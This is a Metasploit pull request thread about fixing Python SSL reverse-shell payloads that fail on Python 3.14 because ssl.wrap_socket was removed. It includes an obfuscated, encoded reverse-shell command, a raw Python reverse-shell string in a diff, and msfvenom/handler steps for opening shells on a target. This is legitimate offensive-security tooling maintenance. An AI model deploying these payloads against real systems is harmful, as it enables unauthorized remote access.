### PR TITLE
Fix incompatibility with ssl.wrap_socket() in newer python versions in payloads using it 

### LINKED ISSUE #21301: cmd/unix/reverse_python_ssl Fails on Python 3.14
## Steps to reproduce

Test the `cmd/unix/reverse_python_ssl` payload with Python 3.14, see it fail

```
echo exec\(__import__\(\'zlib\'\).decompress\(__import__\(\'base64\'\).b64decode\(__import__\(\'codecs\'\).getencoder\(\'utf-8\'\)\(\'eNptj81qwzAQhM/WU+hmiaoiNmlxCjqE4kAobUMTn41qbYipahmtnLx+Zez+Ul3EfrMzzLbvvfOBomveIAgcXnvvGkAUDgWiJejUpMnpY/O03tTbp/Ig5nH/fP9Q7w8v5fqRR49sXNdBExhLs1Uus9tCZjcrmeVFKpbx8bikYry8eN3XX8mRVmqjLQK5nFoLtHOxWnVHEqODVig9NGeWLfIlJ0l7pBY6NipcqUVcSrCiih78ACQZz1Df58id6+dlaaBxBlg6hON1kXKBJ7BWjTaBwbgh/PJtd+WIwfv/cNv9pbHZlFKftR1AjZqcSKyvDeP0in7CmDrD6JIInWE/zZx8AGzAi/E\=\'\)\[0\]\)\)\) | $(which python || which python3 || which python2) -
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<string>", line 4, in <module>
AttributeError: module 'ssl' has no attribute 'wrap_socket'
```

## Expected behavior

It should work. It should also continue to work with all of the same versions it used to.

## Current behavior

Right now it crashes, see the stack trace above.

### Metasploit version

Latest from git.

## Additional Information
It's imperative that the solution continues to work on all of the same version of python that it used to. An acceptable solution will not drop Python 2.7 support. The current module does work with Python 3.4, so the change where `ssl.wrap_socket` was dropped happend somewhere between 3.4 and 3.14. These types of command payloads aren't typically constrained by size, so increasing it to handle the extra Python versions isn't a major concern.

It's possible that other Python payloads are also affected by this issue where `ssl.wrap_socket` is invoked and will cause an exception. It would be helpful to investigate the other Python payloads to look for this and fix it as necessary.

Spotted while testing #21255.

### PR DESCRIPTION
**Pull request by jeanmtr**
Fixes #21301

Changes `python/meterpreter/reverse_tcp_ssl`, `cmd/unix/reverse_python_ssl` and `python/shell_reverse_tcp_ssl` to use `SSLContext.wrap_socket()` instead of `ssl.wrap_socket()`. However since the protocols that can be used in version 3.14 and 2.7.18 are not the same, i cannot use `ssl.PROTOCOL_TLS_CLIENT` for both. Instead, we check if ssl.PROTOCOL_TLS_CLIENT exists and if not, we use ssl.wrap_socket the old way. There is probably a better solution but i cannot find it. One other thing that could work is to use `ssl.PROTOCOL_TLSv1_2` which existe both on 2.7.18 and on 3.14 (and in version in between) but it is marked as deprecated therefore it is not really future proof. 

#### For  `cmd/unix/reverse_python_ssl` 
- [ ] Generate ssl key and cert
- [ ] Run `openssl s_server -accept 4444 -cert server.crt -key server.key -quiet`
- [ ] Setup python env to test compatibility with different python versions (`pyenv local [version]`)
- [ ] Run `msfvenom -p cmd/unix/reverse_python_ssl LHOST=[host to test]`
- [ ] Run the payload 
- [ ] **Verify** if the reverse shell is working 
- [ ] Repeat the process with other python versions

#### For `python/shell_reverse_tcp_ssl`

- [ ] Generate ssl key and cert
- [ ] Run `openssl s_server -accept 4444 -cert server.crt -key server.key -quiet`
- [ ] Setup python env to test compatibility with different python versions (`pyenv local [version]`)
- [ ] Run `msfvenom -p cmd/unix/reverse_python_ssl LHOST=[host to test]`
- [ ] Run python -c "[payload]"
- [ ] **Verify** if the reverse shell is working 
- [ ] Repeat the process with other python versions

#### For `python/meterpreter/reverse_tcp_ssl`
(on the host)
- [] Run msfconsole 
- [] use exploit/multi/handler
- [] set payload python/meterpreter/reverse_tcp_ssl
- [] set LHOST your_ip
- [] set LPORT 4444
- [] run

(on the attacked machine)
- [ ] Setup python env to test compatibility with different python versions (`pyenv local [version]`)
- [ ] Run `msfvenom -p cmd/unix/reverse_python_ssl LHOST=[host to test]`
- [ ] Run python -c "[payload]"
- [ ] **Verify** if the reverse shell is working 
- [ ] Repeat the process with other python versions

### CODE REVIEW

File: modules/payloads/singles/cmd/unix/reverse_python.rb [hunk 1]
```diff
@@ -60,9 +60,9 @@ def command_string
     raw_cmd = "import socket,subprocess,os;host=\"#{datastore['LHOST']}\";port=#{datastore['LPORT']};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(\"#{datastore['SHELL']}\")"
     cmd = raw_cmd.gsub(/,/, "#{random_padding},#{random_padding}").gsub(/;/, "#{random_padding};#{random_padding}")
     if datastore['PythonPath'].blank?
-      return "echo #{Shellwords.escape(py_create_exec_stub(cmd))} | $(which python || which python3 || which python2) -"
```
Comment (bwatters-r7) [inline modules/payloads/singles/cmd/unix/reverse_python.rb:63]: What does the hyphen removal do?

File: lib/msf/core/payload/python/reverse_tcp_ssl.rb [hunk 2]
```diff
@@ -1,88 +1,95 @@
...
-#
-###
-
-module Payload::Python::ReverseTcpSsl
-
-  include Msf::Payload::Python
-  include Msf::Payload::Python::ReverseTcp
-  def initialize(*args)
-    super
-    register_advanced_options(Msf::Opt::stager_retry_options)
```
Comment (bwatters-r7) [inline lib/msf/core/payload/python/reverse_tcp_ssl.rb:17]: Is there a reason for this?  The double colon `::` appears to be the standard?

Comment (jeanmtr) [reply lib/msf/core/payload/python/reverse_tcp_ssl.rb:17]: I got this warning when running rubocop on the file : `lib/msf/core/payload/python/reverse_tcp_ssl.rb:17:39: C: [Correctable] Style/ColonMethodCall: Do not use :: for method calls.
    register_advanced_options(Msf::Opt::stager_retry_options)` so i applied the autofix, should i revert it to how it was initially ?

File: modules/payloads/singles/cmd/unix/reverse_python.rb (hunk 1 above)
Comment (jeanmtr) [reply modules/payloads/singles/cmd/unix/reverse_python.rb:63]: tldr : it does not do anything i will put it back

in #21168 i received [this](https://github.com/rapid7/metasploit-framework/pull/21168#pullrequestreview-4030451735) comment hinting at the fact that the hyphen might have been unnecessary. After testing, i could not find a use case where it changed anything so i removed it. 

I removed it in this PR for consistency but i forgot that my previous pr was merged without those changes due to problems with github (i had to reopen the PR on another account) therefore it is not consistent and i will put it back.

**Comment by jeanmtr** [comment]
I squashed commits into one because I had issues with git, sorry for the inconvenience.

**Comment by smcintyre-r7** [comment]
Superseded by #21484
